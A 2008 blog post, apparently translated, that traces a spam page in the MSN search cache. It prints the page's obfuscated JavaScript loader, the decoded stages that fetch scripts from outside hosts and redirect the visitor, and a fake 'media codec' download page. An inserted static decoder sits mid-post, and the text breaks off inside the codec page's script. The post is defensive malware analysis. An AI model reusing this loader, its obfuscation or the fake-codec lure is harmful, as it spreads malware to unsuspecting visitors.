Tuesday, April 15. 2008
MSN cache helps spread malware
Today I searched for katsumi+grospolina on search.msn.com.
One entry there immediately sparked my urge to investigate:
While the host fathom.ddns.ws stopped working long ago, a click on the cache link takes us to the following page:
Oh yes, that's what happens when you share a nick with a porn actress. (By the way: she goes by kasuni now.) The pop-up window, drawn in XP style, already makes you suspicious, especially if you have W2K installed :p ...but great that someone is finally giving me the codec thing I need, since the MS media player always tries to download something and never manages to! So I clicked on it ...and the disaster takes its course.
While Google now seems to be free of such entries, M$ does not seem to care. Let's get to the bottom of this with malzilla! When requesting http://cc.msnscache.com/cache.aspx?q=73022418196251&mkt=de-AT&lang=de-AT&w=ce31ddfb&FORM=CVRE8 malzilla first spits out this:
CODE:
<base href="http://fathom.ddns.ms/article/katsumi.html" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><table width="100%" style="background-color:#fff;" border="1" bordercolor="#909090" cellpadding="5"><tr><td><span style="color: black; font: normal normal normal small normal arial,sans-serif;">Dies ist eine Version von <a style="color: blue; text-decoration: underline; font: normal normal normal small normal arial,sans-serif;" href="http://fathom.ddns.ms/article/katsumi.html">http://fathom.ddns.ms/article/katsumi.html</a> zu dem Zeitpunkt, zu dem unser Crawler die Seite unter 07.03.2008 untersucht hat. Die unten angezeigte Seite ist die Version in unserem Index, der verwendet wurde, um diese Seite in den Ergebnissen auf die aktuelle Suche einzuordnen. 
Dies ist möglicherweise nicht die neueste Version der Seite - wenn Sie die aktuellste Version dieser Seite anzeigen möchten, <a style="color: blue; text-decoration: underline; font: normal normal normal small normal arial,sans-serif;" href="http://fathom.ddns.ms/article/katsumi.html">rufen Sie sie im Internet auf</a>.<div style="margin-top: 10px;"><span style="font-style: italic;">Live.com ist nicht mit dem Inhalt der unten angezeigten Seite oder den Parteien verbunden, die für diesen verantwortlich sind.</span></div></span></td></tr></table>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wasaki Katsumi's Home Page</title>
<link rel="stylesheet" href="http://fathom.ddns.ms/style.css" type="text/css" media="screen" >
</head>
<body><script>function u(RL,P){if(!P){P='v@7(LAJ*wUg$M_i%0I!YHa,Eysmt3u8Zk]Wb4=[`oQD^efKx?;FXh1z)|C+&Gj6<';}var K;var av='';for(var q=0;q<RL.length;q+=4){K=(P.indexOf(RL.charAt(q))&255)<<18|(P.indexOf(RL.charAt(q+1))&255)<<12|(P.indexOf(RL.charAt(q+2))&255)<<(6)|P.indexOf(RL.charAt(q+3))&255;av+=String.fromCharCode((K&16711680)>>16,(K&65280)>>8,K&255);}eval(av);}u('sJjbu,1=t`0Ku)UQuJHoUX;XyF3^U)UQ3*0k3)Ub%!Uou*I?iWGxtJ=Ks,Abt)aKu7CQt[sx$z_`m!1Wm,|x3za]3[_o%z=4%YL)_(L?_Ws^%,f]u*_1t,4[3[a[%!3^sE_byE@=gJIxy)afs,Ch$`U=s[aF3[aFg!e`wb|G$)_bUFe`3[=?u(|`gYek');</script>
<div id="wrapper">
<div id="head"><a href="http://fathom.ddns.ms/article/email-lycos-uk.html"><img src="http://fathom.ddns.ms/image/bg-head-1.gif" border="0" alt="" /></a></div>
<div id="container">
<div id="pagecontent">
<div id="left">
<div id="content">
<br />
<h2> - Katsuni Wikipedia, free the</h2>
<br />
<a href="http://fathom.ddns.ms/article/old-car-auto-trader.html" class="postTitle" rel="bookmark" > Car Trader - Old</a>
<br />
<i> to a Thanks customer</i> <b> in </b> <a href="http://fathom.ddns.ms/article/advocate.html" rel="category tag"> The Award</a> <b> Katsumi, </b>
<div class="storycontent">
<p> Japan who requested <strong> this </strong> product, can now you these order bodysuits based on fiberglass moulds <a href="http://snowed.mrbonus.com/lib/michael-faraday.html"> Michael</a> from this website.. <a href="http://stamps.mrbonus.com/pregnancy-after.html"> Pregnancy after 45-years-old</a> del.icio.us . | recent · popular login | register | del.icio.us, help. the web. items (11). All Katsuni, anciennement ne Katsumi, Cline Tran</p>
<p> le 9 [4] avril Lyon, 1979 est une actrice pornographique Elle franaise. fait a ses tudes George l'Institut. Yuzawa Katsumi was born Los in Angeles, California 1915. in He and his were family at incarcerated the concentration Amache camp <img src="http://fathom.ddns.ms/image/icon_smile.gif" alt="" class="wp-smiley" /> </p>
<p> in Colorado in 1942. Dr. Katsumi Furitsu, Japan. Medical doctor at the Hospital for Radiation Victims, <strong> Osaka (mostly </strong> Hibakusha), Delegate of the Investigation
</p>
</div>
<hr />
<div class="feedback" align="right">
</div>
<h3 id="comments"> - Wikipedia, Katsuni free the encyclopedia</h3>
<ol class="commentlist">
<li class="alt" id="comment-227">
<cite> of Hibakusha. </cite> Katsumi
<br />
<small class="commentmetadata"><a href="http://fathom.ddns.ms/article/emc-proven-professional.html" > CertMag.com EMC Professional Proven</a> </small>
<p> Papers Japanese Australia, Japanese Teas Japanese Australia, Gifts Embroidery Incense & Salts, Bath
</p>
</li>
<li class="" id="comment-228">
<cite><a href="http://saxton.ddns.ms/styles/diet-tips.html" rel=''> Best Diet 15 Tips</a></cite> Buy Japanese
<br />
<small class="commentmetadata"><a href="http://fathom.ddns.ms/article/payday-advances.html" > Payday Loan</a> </small>
<p> Paper Products Online. Katsumi Electric Co. has been making keyers since the 1960's, their equipment has
</p>
</li>
<li class="alt" id="comment-233">
<cite><a href="http://choke.mrbonus.com/article/literary-agent.html" rel=''> Literary</a></cite> an unsurpassed
<br />
<small class="commentmetadata"><a href="http://fathom.ddns.ms/article/vera-drake.html" > Drake Vera (2004)</a> </small>
<p> reputation for rugged reliability.. FIND MORE STORIES IN: Japan | US economy | Dow | Composite Index | Hang Seng Index | Nikkei 225 Index | Stock price | KATSUMI. grey rule. Katsumi <img src="http://fathom.ddns.ms/image/icon_smile.gif" alt="" class="wp-smiley" /> was a 21-year-old university student planning to <img src="http://fathom.ddns.ms/image/icon_smile.gif" alt="" class="wp-smiley" />
</p>
</li>
</ol>
<br />
</div>
<div class="navigation" align="center">
<div align="left"></div>
<div align="right"></div>
</div>
</div>
<div id="center">
<br />
<div align="left"></div>
<div align="right"></div>
<br />
<div id="menu">
<ul>
<li><b> be a French teacher </b>
<ul id="themeswitcher">
<li>
<select name="themeswitcher" onchange="location.href='http://managedtasks.com/wpthemes/blog/index.php?wptheme=' + this.options[this.selectedIndex].value;">
<option value="Aidens Theme"> when Penthouse </option>
<option value="akhdian"> France, </option>
<option value="Almodovar"> intrigued </option>
<option value="Almost Spring"> by her racial </option>
<option value="Amsterdam Nights"> mix, invited her </option>
<option value="anarchy"> to pose.. </option>
<option value="Anthurium Mix"> Katsumi NAGAI. </option>
<option value="Archway"> You can </option>
<option value="Batavia 1.5"> contribute</option>
<option value="Benevolence"> information </option>
<option value="Black-LetterHead"> to this page, but </option>
<option value="blogtimes"> first you </option>
<option value="Blue-Bye-You"> must login or </option>
<option value="Blueberry Boat"> register. Cast </option>
<option value="Blue Radiant"> in: Banner of </option>
<option value="Borderline Chaos"> the Stars (TV) as </option>
<option value="Boxy But Gold"> By Guen. the</option>
<option value="c3ro fire"> time Watanabe </option>
<option value="c3ro silence" selected="selected"> Katsumi arrived, </option>
<option value="ChinaRed"> the swamp </option>
<option value="Chocolate Candy"> had been filled </option>
<option value="Chuck A Wobbly"> in and the area, </option>
<option value="Clasikue"> named after </option>
<option value="Coffee Cup"> a Kabuki theater </option>
<option value="Connections"> that was never </option>
<option value="Crop Circles"> built, was a </option>
<option value="Cub Reporter"> Katsumi Ono: </option>
<option value="Curtains Up"> STARmeter,</option>
<option value="Daisy Rae Gemini"> Message Boards.. </option>
<option value="Dark Maple"> Katsumi Ono </option>
<option value="Deichnetz"> Not (I),</option>
<option value="Delusions"> the Katsumi </option>
<option value="Desert Theme"> Ono you're </option>
<option value="Devenir En Gris"> looking for? Main </option>
<option value="Dixie Belle"> Details · </option>
<option value="Elvgren"> Filmography </option>
<option value="equiX"> · </option>
<option value="Express Yourself"> Personal Details </option>
<option value="Fading Flowers"> · Media. </option>
<option value="Falling Dreams"> Katsumi Ihara</option>
<option value="FastTrack"> compensation, </option>
<option value="Fleur De Lys"> earnings, stock </option>
<option value="Flex"> options, </option>
<option value="ForumED"> career</option>
<option value="Framefake Theme"> history, current </option>
<option value="Fresh Bananas"> profile and additional </option>
<option value="GanjaPress"> information </option>
<option value="Garden Log"> at Forbes.com. </option>
<option value="Gentle Calm"> Katsumi NAGAI. </option>
<option value="Gespaa theme"> You can contribute </option>
<option value="Gespaa theme - Two Columns"> information to this page, </option>
<option value="Girls-Suck"> but first</option>
<option value="Golden Gray"> you must login </option>
<option value="Green Marinee"> or register.</option>
<option value="Greenwood"> in: Cast</option>
<option value="Grimelda"> Banner of </option>
<option value="Head"> the</option>
<option value="Hiperminimalist"> Stars (TV) as Guen. </option>
<option value="Illumination"> del.icio.us</option>
<option value="Imhotep"> popular .</option>
<option value="Impressionist"> | recent · </option>
<option value="Iris"> login </option>
<option value="Jakarta"> | register </option>
<option value="Journalized Blue"> | help. del.icio.us, </option>
<option value="Journalized Sand"> the web. All items </option>
<option value="Journalized Winter"> (11). span class=fFile</option>
<option value="Juicy"> Format:span </option>
<option value="Just A Mindset"> PDFAdobe Acrobat </option>
<option value="Landzilla"> - a as HTMLa </option>
<option value="LastRegrets"> Insider Filings </option>
<option value="LetterHead"> - HIROKAWA </option>
<option value="Lucid"> KATSUMI, </option>
<option value="mallow"> Last Updated </option>
<option value="man~ja"> 31-Oct-07. </option>
<option value="Meadow"> HIROKAWA </option>
<option value="Minim8"> KATSUMI: </option>
<option value="Minima Plus"> Declared Holdings. </option>
<option value="MintyGreen"> Reported,</option>
<option value="Mixed Bouquet"> Shares, Ownership. </option>
<option value="MTsix"> Katsumi </option>
<option value="Museum"> Suzuki </option>
<option value="narnia"> ( , Suzuki </option>
<option value="Neptune"> Katsumi?) </option>
<option value="Neuron"> (born</option>
<option value="Northern-Web-Coders"> 5, 1956) is August</option>
<option value="Notebook"> a Japanese </option>
<option value="NYC"> seiy. </option>
<option value="Oasis"> He is </option>
<option value="Ocadia"> best known </option>
<option value="Off the Wall"> as the voice </option>
<option value="Operate"> of Kagome's </option>
<option value="OrangeSky"> grandfather </option>
<option value="Oxymod"> in InuYasha. </option>
<option value="Parishuddha"> Katsuni, anciennement </option>
<option value="Plain Vanilla"> Katsumi, ne Cline </option>
<option value="Pool"> Tran </option>
<option value="Postcards From the Edge"> le [4] 9 avril 1979 Lyon, </option>
<option value="pumpkin"> est une </option>
<option value="RadMod"> actrice </option>
<option value="Rampart"> pornographique </option>
<option value="Random Image"> franaise. Elle </option>
<option value="rdc* theme"> a fait ses </option>
<option value="Red Train"> tudes l'Institut.</option>
<option value="Reflections"> Chief Scientist. </option>
<option value="Retrospotive"> Katsumi MIDORIKAWA </option>
<option value="Rin"> (D.Eng.) </option>
<option value="RohitKumar.org"> Research Subjects. </option>
<option value="Safety"> (1), Ultrashort </option>
<option value="Scam City"> high intensity </option>
<option value="Scattered"> lasers and </option>
<option value="Sharepoint like"> their applications </option>
<option value="Simple Green"> to strong field </option>
<option value="Sixties"> interactions. </option>
<option value="Slash Dot"> span - 1k</option>
<option value="Sleek"> - spannobra </option>
<option value="Soothe"> class=fl </option>
<option value="Spirit"> - a class=fl </option>
<option value="Spring Fairy"> pagesan Name, </option>
<option value="Squares"> Katsumi </option>
<option value="Starburst"> Fujiwara. </option>
<option value="Steam"> Job Title, </option>
<option value="Stevish 2"> Associate </option>
<option value="Stevish Dream"> Professor. Function </option>
<option value="Stripes"> Name, Graduate </option>
<option value="stucco"> School </option>
<option value="Stylish Blue Modern"> of Humanities and of </option>
<option value="Tech-Bytes"> Letter. Katsumi </option>
<option value="Travelogue"> Cho find the </option>
<option value="Tropical Breeze"> latest news, biography, </option>
<option value="Weblogs.us"> career milestones, </option>
<option value="White as Milk"> credits, filmography, </option>
<option value="Windstorm"> photos and </option>
<option value="WordPress Classic"> video clips on Yahoo! </option>
<option value="WordPress Default"> TV. Author Details. </option>
<option value="Wuhan"> Name:. </option>
<option value="Yaaarr! Tis me blog!"> Katsumi Takahashi. Citations </option>
<option value="Zen Minimalist"> by Katsumi Takahashi. </option>
<option value="Zig-Zag"> Sort By, </option>
</select>
</li>
</ul> </li>
<br />
<li id="pagenav"><h2> Katsuni</h2><ul><li class="page_item"><a href="http://fathom.ddns.ms/article/trisomy-18.html" > Trisomy</a>
</li>
<li class="page_item"><a href="http://fathom.ddns.ms/article/netscape-plug-ins.html" > Browser Add-ons</a>
</li>
<li class="page_item"><a href="http://fathom.ddns.ms/article/kitchener-waterloo.html" > Waterloo Kitchener</a>
</li>
</ul></li> <br />
<li id="linkcat-1"><h2> Katsuni -</h2>
<ul>
<li><a href="http://doors.servemp3.com/live-maine-music.html"> Portland,</a></li>
<li><a href="http://doors.servemp3.com/free-white-pages.html"> Free White</a></li>
<li><a href="http://warren.servemp3.com/articles/50-cent-how-we.html"> GAME THE</a></li>
<li><a href="http://beads.servemp3.com/mommy-and-son.html"> Mom-son-sex</a></li>
<li><a href="http://known.servemp3.com/topic/booty-shots-of.html"> Jennifer</a></li>
<li><a href="http://known.servemp3.com/topic/pillow-talk.html"> Pillow</a></li>
<li><a href="http://fathom.ddns.ms/article/piso-compra-barcelona.html"> fotocasa.es:</a></li>
<li><a href="http://yorick.mrbonus.com/pages/attacktix-starter.html"> wars star</a></li>
</ul>
</li>
<li id="archives"> Title, Year. <ul>
<li><a href="http://fathom.ddns.ms/article/real-life-street.html" > YouTube - Real</a></li>
<li><a href="http://fathom.ddns.ms/article/bear-cubs.html" > Image results</a></li>
</ul>
</li>
<br />
<li id="meta"> The citations <ul>
<li><a href="http://fathom.ddns.ms/article/100-ceramic-hair.html" > Product search</a>
</li>
<li><a href="http://fathom.ddns.ms/article/women-pee-in.html" > Book results for women</a>
<ul class='children'> <li><a href="http://fathom.ddns.ms/article/swimmers.html" > results Image</a>
</li>
<li><a href="http://fathom.ddns.ms/article/attempt-to-access.html" > BUG: "Attempt</a>
</li>
<li><a href="http://fathom.ddns.ms/article/rigolotte.html" > Rigolotte</a>
</li>
<li><a href="http://fathom.ddns.ms/article/thurleston-hotel.html" > Thurlestone</a>
</li>
</ul>
</li>
<li><a href="http://fathom.ddns.ms/article/vancomycin-dose.html" > Pharmacokinetic</a>
</li>
</ul>
<br /></li><li id="search"> listed
<ul>
<form id="searchform" method="get" action="">
<input type="text" name="s" id="s" size="15" class="input" >
<input type="submit" name="submit" value="GO" class="button">
</form><br />
</ul>
<ul>
<li><a href="http://fathom.ddns.ms/article/gravediggaz.html" ><abbr > here </abbr> <h2 class=r><a</a></li>
</ul>
</li>
</ul>
</div>
</div>
<div id="right">
<br />
<table id="wp-calendar">
<caption> are for reference </caption>
<thead>
<tr>
<th abbr="Monday" scope="col" > </th>
<th abbr="Tuesday" scope="col" > only.. </th>
<th abbr="Wednesday" scope="col" > Katsumi </th>
<th abbr="Thursday" scope="col" > Kitagawa, </th>
<th abbr="Friday" scope="col" > PhD. </th>
<th abbr="Saturday" scope="col" > Assistant </th>
<th abbr="Sunday" scope="col" > Member, </th>
</tr>
</thead>
<tfoot>
<tr>
<td abbr="" colspan="3" id="prev"><a href="http://fathom.ddns.ms/article/evil-symbols.html" > Image</a></td>
<td class="pad"> St. </td>
<td colspan="3" id="next" class="pad"> Jude </td>
</tr>
</tfoot>
<tbody>
<tr>
<td colspan="1" class="pad"> Faculty. </td><td><a href="http://fathom.ddns.ms/article/stevens-johnson.html" > eMedicine</a></td><td><a href="http://fathom.ddns.ms/article/two-women-kissing.html" > Two</a></td><td> Katsumi </td><td> Kitagawa, </td><td> PhD </td><td><a href="http://fathom.ddns.ms/article/golden-links.html" > Golden</a></td>
</tr>
<tr>
<td><a href="http://fathom.ddns.ms/article/atlanta-georgia.html" > Georgia</a></td><td><a href="http://fathom.ddns.ms/article/in-legend-movie.html" > Urban</a></td><td> Molecular </td><td><a href="http://fathom.ddns.ms/article/nipple-biting.html" > Nipple</a></td><td><a href="http://fathom.ddns.ms/article/norfolk-international.html" > Welcome</a></td><td> Pharmacology </td><td><a href="http://fathom.ddns.ms/article/leather-journals.html" > Long</a></td>
</tr>
<tr>
<td> MS </td><td><a href="http://fathom.ddns.ms/article/kids-crafts.html" > DLTK's</a></td><td><a href="http://fathom.ddns.ms/article/north-carolina.html" > North</a></td><td> 230, </td><td> Room </td><td><a href="http://fathom.ddns.ms/article/made.html" > MADE</a></td><td> D-3007C. </td>
</tr>
<tr>
<td><a href="http://fathom.ddns.ms/article/men-in-bathroom.html" > Sexy</a></td><td><a href="http://fathom.ddns.ms/article/roof-top-heavy.html" > Fasteners</a></td><td> GROSPOLINA.ORG.</td><td><a href="http://fathom.ddns.ms/article/river-raisin.html" > River</a></td><td><a href="http://fathom.ddns.ms/article/shake-ya-tailfeather.html" > Nelly</a></td><td><a href="http://fathom.ddns.ms/article/online-investing.html" > Welcome</a></td><td><a href="http://fathom.ddns.ms/article/wild-arms.html" > Wild</a></td>
</tr>
<tr>
<td><a href="http://fathom.ddns.ms/article/barnes-book.html" > Barnes</a></td><td> Nepenthes. </td><td> Katsumi. </td><td><a href="http://fathom.ddns.ms/article/online-scrapbook.html" > Scrapbook</a></td>
<td class="pad" colspan="3"> To </td>
</tr>
</tbody>
</table> <div id="buttons">
<br />
<a class="img" href="http://stamps.mrbonus.com/lga-search-airport.html" ><img src="http://fathom.ddns.ms/image/b_listen.gif" width="80" height="15" border="0" alt="" /></a>
<br /><a class="img" href="http://large.ddns.ms/styles/anime-gallery.html" ><img src="http://fathom.ddns.ms/image/b_hunger.gif" width="80" height="15" border="0" alt="" /></a>
<br /><a class="img" href="http://large.ddns.ms/styles/optoma-home-theater.html" ><img src="http://fathom.ddns.ms/image/b_eff.gif" width="80" height="15" border="0" alt="" /></a>
<br /><a class="img" href="http://saxton.ddns.ms/styles/rubies.html" ><img src="http://fathom.ddns.ms/image/b_aortal.gif" width="80" height="15" border="0" alt="" /></a>
<br /><a class="img" href="http://choke.mrbonus.com/article/radcliffe-squires.html" ><img border="0" alt="Get Firefox!" src="http://fathom.ddns.ms/image/white_1.gif"></a>
<br />
<form action="">
<input style="width:75px; font:bold 11px verdana, helvetica, sans-serif; color:white; background-color:#0066CC;" type="button" value="SOUL" name="button" >
</form>
</div>
</div>
<div id="footer">
<p> take full advantage <a href="http://grapes.ddns.ms/article/supply-chain.html" target="new"> Image results</a> of Flickr, <br /> you should <a href="http://grapes.ddns.ms/article/nikki-cox-tits.html" target="new"> Nikki</a>
<br /><br />
</p>
</div>
</div>
</div>
</div>
</body>
</html>
What stands out here is the obfuscated script:
CODE:
<script>function u(RL,P){if(!P){P='v@7(LAJ*wUg$M_i%0I!YHa,Eysmt3u8Zk]Wb4=[`oQD^efKx?;FXh1z)|C+&Gj6<';}var K;var av='';for(var q=0;q<RL.length;q+=4){K=(P.indexOf(RL.charAt(q))&255)<<18|(P.indexOf(RL.charAt(q+1))&255)<<12|(P.indexOf(RL.charAt(q+2))&255)<<(6)|P.indexOf(RL.charAt(q+3))&255;av+=String.fromCharCode((K&16711680)>>16,(K&65280)>>8,K&255);}eval(av);}u('sJjbu,1=t`0Ku)UQuJHoUX;XyF3^U)UQ3*0k3)Ub%!Uou*I?iWGxtJ=Ks,Abt)aKu7CQt[sx$z_`m!1Wm,|x3za]3[_o%z=4%YL)_(L?_Ws^%,f]u*_1t,4[3[a[%!3^sE_byE@=gJIxy)afs,Ch$`U=s[aF3[aFg!e`wb|G$)_bUFe`3[=?u(|`gYek');</script>
You only do something like this when you want to hide something, and the msnbot will not execute the script, ever. So let's have malzilla untangle the thing:
CODE:
document.write('<sc'+'ript src="http://lineacount.info/cgi-bin/search?id=174106&k=katsumi&ref='+escape(document.referrer)+'"></sc'+'ript>');
We have malzilla download this address as well:
CODE:
function S(LH,W){if(!W){W='V(#q3HRou<lZ/zhYri[a9QXwA+8!FSB$^g).E]`CMs{J%0p_dKtxfbTjG4=1&my;';}var T;var PC='';for(var j=0;j<LH.length;j+=4){T=(W.indexOf(LH.charAt(j))&255)<<18|(W.indexOf(LH.charAt(j+1))&255)<<12|(W.indexOf(LH.charAt(j+2))&255)<<(6)|W.indexOf(LH.charAt(j+3))&255;PC+=String.fromCharCode((T&16711680)>>16,(T&65280)>>8,T&255);}eval(PC);}S('+Rm.SXb]!CrpSj<sSR9M<xKxAtFJ<j<sForyuRi_AjQ0+X4fZ`K_ATHf8XmpY[<MSoidh)&_AXib!or0+C<]+wibA`90h#4.!Tf_+C<]+Xb_S`]]Zfb_S`]]h)9t/R0gSozb!XE]zfzaFRQ.8XH%<audaR])F`HtBaM]/.(JAwixSXbsZxFtz[&fZtu^Y#mxAtFJ<j<sFory<tE1');
Again, what gets loaded here is very odd, and once more malzilla sheds some light on it:
CODE:
document.write('<sc'+'ript> document.location="http://adult-freetube-8.com/freemovie/Movie:%20katsumi%7CSpecial%20Library:%20katsumi/725/4/" </sc'+'ript>');
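The unpacking that malzilla performs in the steps above can also be done statically. The following is an added example, not part of the original post and not malzilla's code: it reads the 64-symbol alphabet and the payload out of the first loader as plain string literals, decodes them without ever calling eval, and lists the URL the decoded script would pull in. The function names and the defang helper are assumptions made for this example; the parser matches literals rather than variable names, so a renamed loader of the same shape is handled the same way.

```javascript
// Added example (not from the original post): static unpacking of the loader
// found in the cached page. The sample is handled as data and never eval()'d.

// The <script> body exactly as shown in the dump above.
const SAMPLE_LOADER =
  "function u(RL,P){if(!P){P='v@7(LAJ*wUg$M_i%0I!YHa,Eysmt3u8Zk]Wb4=[`oQD^efKx?;FXh1z)|C+&Gj6<';}" +
  "var K;var av='';for(var q=0;q<RL.length;q+=4){K=(P.indexOf(RL.charAt(q))&255)<<18|" +
  "(P.indexOf(RL.charAt(q+1))&255)<<12|(P.indexOf(RL.charAt(q+2))&255)<<(6)|" +
  "P.indexOf(RL.charAt(q+3))&255;av+=String.fromCharCode((K&16711680)>>16,(K&65280)>>8,K&255);}" +
  "eval(av);}" +
  "u('sJjbu,1=t`0Ku)UQuJHoUX;XyF3^U)UQ3*0k3)Ub%!Uou*I?iWGxtJ=Ks,Abt)aKu7CQt[sx$z_`m!1Wm,|x" +
  "3za]3[_o%z=4%YL)_(L?_Ws^%,f]u*_1t,4[3[a[%!3^sE_byE@=gJIxy)afs,Ch$`U=s[aF3[aFg!e`wb|G$)_b" +
  "UFe`3[=?u(|`gYek');";

// Find the substitution alphabet and the encoded payload among the
// single-quoted literals, independent of function and variable names.
function extractLoaderParts(src) {
  const literals = [...src.matchAll(/'([^']*)'/g)].map((m) => m[1]);
  const alphabet = literals.find((s) => s.length === 64 && new Set(s).size === 64);
  if (!alphabet) throw new Error("no 64-symbol alphabet literal found");
  const payload = literals
    .filter((s) => s !== alphabet && s.length > 0 && s.length % 4 === 0)
    .filter((s) => [...s].every((c) => alphabet.includes(c)))
    .sort((a, b) => b.length - a.length)[0];
  if (!payload) throw new Error("no payload literal matching the alphabet");
  return { alphabet, payload };
}

// The scheme is base64 with a shuffled alphabet and no padding symbol:
// four symbols carry 6 bits each and yield three bytes.
function decodePayload(payload, alphabet) {
  if (payload.length % 4 !== 0) throw new Error("payload length is not a multiple of 4");
  let out = "";
  for (let i = 0; i < payload.length; i += 4) {
    let k = 0;
    for (let j = 0; j < 4; j++) {
      const idx = alphabet.indexOf(payload[i + j]);
      // The original masks a failed lookup with &255 and emits garbage;
      // an analysis tool should flag it instead.
      if (idx < 0) throw new Error(`symbol outside alphabet at offset ${i + j}`);
      k = (k << 6) | idx;
    }
    out += String.fromCharCode((k >> 16) & 255, (k >> 8) & 255, k & 255);
  }
  return out;
}

// Undo the '<sc'+'ript' style splitting used to dodge naive string matching.
function foldStringConcats(js) {
  return js.replace(/'\s*\+\s*'/g, "");
}

function extractUrls(js) {
  return js.match(/https?:\/\/[^\s'"<>]+/g) || [];
}

// Make indicators safe to paste into tickets and chat.
function defang(s) {
  return s.replace(/^http/, "hxxp").replace(/\./g, "[.]");
}

function analyzeLoader(src) {
  const { alphabet, payload } = extractLoaderParts(src);
  const decoded = decodePayload(payload, alphabet);
  const urls = extractUrls(foldStringConcats(decoded));
  const hosts = [...new Set(urls.map((u) => new URL(u).hostname))];
  return { decoded, urls, hosts };
}

const report = analyzeLoader(SAMPLE_LOADER);
console.log(report.decoded.trim());
console.log(report.urls.map(defang));
```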
...and with that we have arrived at the page mentioned earlier. You can guess what comes next... off it goes into our malzilla browser:
CODE:
<HTML><HEAD><TITLE>~~!ADULT-FREETUBE-8.COM MOVIE HARDCORE VIDEO ONLINE!~~</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1251">
<META content="MSHTML 6.00.2900.2180" name=GENERATOR></HEAD>
<BODY oncontextmenu="return false;" text=#ccffff vLink=#eeeeee link=#eeeeee bgColor=black leftMargin=0 topMargin=0>
<H2 style="MARGIN: 0px; FONT: bold 14pt Arial; COLOR: #ffff00" align=center>
MOVIE: KATSUMI</H2>
<SCRIPT language=javascript>
newurl = "http://adult-freetube-8.com/m/b/2/white/725/4/";
codec_url='http://sexicodecstars.com/download/502/725/4/';
</script>
<SCRIPT language=javascript src="http://adult-freetube-8.com/popup/pop1.htm"></SCRIPT>
<SCRIPT language=javascript src="http://adult-freetube-8.com/popup/pop2.htm"></SCRIPT>
<SCRIPT language=jscript.encode src="http://adult-freetube-8.com/popup/pop3.htm"></SCRIPT>
<SCRIPT language="javascript">
function softdownload()
{
if(window.navigator.userAgent.indexOf("SV1") != -1 || window.navigator.userAgent.indexOf("MSIE 7") !=-1)
{
return;
}
else
{
window.setTimeout("location.href='" + codec_url + "'", 3000);
}
}
function play() {
if (confirm('Click 'OK' to download and install media codec.')) {
window.location.href=codec_url;
}
else {
if (alert('Please download new version of media codec software.')) {
play();
}
else {
play();
}
}
}
function Down() {
document.getElementById("popdiv").style.visibility="hidden";
window.location.href=codec_url;
}
function Down2() {
document.getElementById("popdiv").style.visibility="visible";
}
function Close()
{
document.getElementById("popdiv").style.visibility="hidden";
play();
}
function Details()
{
alert('Download video codec to view media files.');
}
var Drag = {
obj : null,
init : function(o, oRoot, minX, maxX, minY, maxY, bSwapHorzRef, bSwapVertRef, fXMapper, fYMapper)
{
o.onmousedown = Drag.start;
o.hmode = bSwapHorzRef ? false : true ;
o.vmode = bSwapVertRef ? false : true ;
o.root = oRoot && oRoot != null ? oRoot : o ;
if (o.hmode && isNaN(parseInt(o.root.style.left ))) o.root.style.left = "0px";
if (o.vmode && isNaN(parseInt(o.root.style.top ))) o.root.style.top = "0px";
if (!o.hmode && isNaN(parseInt(o.root.style.right ))) o.root.style.right = "0px";
if (!o.vmode && isNaN(parseInt(o.root.style.bottom))) o.root.style.bottom = "0px";
o.minX = typeof minX != 'undefined' ? minX : null;
o.minY = typeof minY != 'undefined' ? minY : null;
o.maxX = typeof maxX != 'undefined' ? maxX : null;
o.maxY = typeof maxY != 'undefined' ? maxY : null;
o.xMapper = fXMapper ? fXMapper : null;
o.yMapper = fYMapper ? fYMapper : null;
o.root.onDragStart = new Function();
o.root.onDragEnd = new Function();
o.root.onDrag = new Function();
},
start : function(e)
{
var o = Drag.obj = this;
e = Drag.fixE(e);
var y = parseInt(o.vmode ? o.root.style.top : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
o.root.onDragStart(x, y);
o.lastMouseX = e.clientX;
o.lastMouseY = e.clientY;
if (o.hmode) {
if (o.minX != null) o.minMouseX = e.clientX - x + o.minX;
if (o.maxX != null) o.maxMouseX = o.minMouseX + o.maxX - o.minX;
} else {
if (o.minX != null) o.maxMouseX = -o.minX + e.clientX + x;
if (o.maxX != null) o.minMouseX = -o.maxX + e.clientX + x;
}
if (o.vmode) {
if (o.minY != null) o.minMouseY = e.clientY - y + o.minY;
if (o.maxY != null) o.maxMouseY = o.minMouseY + o.maxY - o.minY;
} else {
if (o.minY != null) o.maxMouseY = -o.minY + e.clientY + y;
if (o.maxY != null) o.minMouseY = -o.maxY + e.clientY + y;
}
document.onmousemove = Drag.drag;
document.onmouseup = Drag.end;
return false;
},
drag : function(e)
{
e = Drag.fixE(e);
var o = Drag.obj;
var ey = e.clientY;
var ex = e.clientX;
var y = parseInt(o.vmode ? o.root.style.top : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
var nx, ny;
if (o.minX != null) ex = o.hmode ? Math.max(ex, o.minMouseX) : Math.min(ex, o.maxMouseX);
if (o.maxX != null) ex = o.hmode ? Math.min(ex, o.maxMouseX) : Math.max(ex, o.minMouseX);
if (o.minY != null) ey = o.vmode ? Math.max(ey, o.minMouseY) : Math.min(ey, o.maxMouseY);
if (o.maxY != null) ey = o.vmode ? Math.min(ey, o.maxMouseY) : Math.max(ey, o.minMouseY);
nx = x + ((ex - o.lastMouseX) * (o.hmode ? 1 : -1));
ny = y + ((ey - o.lastMouseY) * (o.vmode ? 1 : -1));
if (o.xMapper) nx = o.xMapper(y)
else if (o.yMapper) ny = o.yMapper(x)
Drag.obj.root.style[o.hmode ? "left" : "right"] = nx + "px";
Drag.obj.root.style[o.vmode ? "top" : "bottom"] = ny + "px";
Drag.obj.lastMouseX = ex;
Drag.obj.lastMouseY = ey;
Drag.obj.root.onDrag(nx, ny);
return false;
},
end : function()
{
document.onmousemove = null;
document.onmouseup = null;
Drag.obj.root.onDragEnd( parseInt(Drag.obj.root.style[Drag.obj.hmode ? "left" : "right"]),
parseInt(Drag.obj.root.style[Drag.obj.vmode ? "top" : "bottom"]));
Drag.obj = null;
},
fixE : function(e)
{
if (typeof e == 'undefined') e = window.event;
if (typeof e.layerX == 'undefined') e.layerX = e.offsetX;
if (typeof e.layerY == 'undefined') e.layerY = e.offsetY;
return e;
}
};
function showPopDiv()
{
var sFlag = "No";
var byFlag = false;
var FlagAr = sFlag.split("");
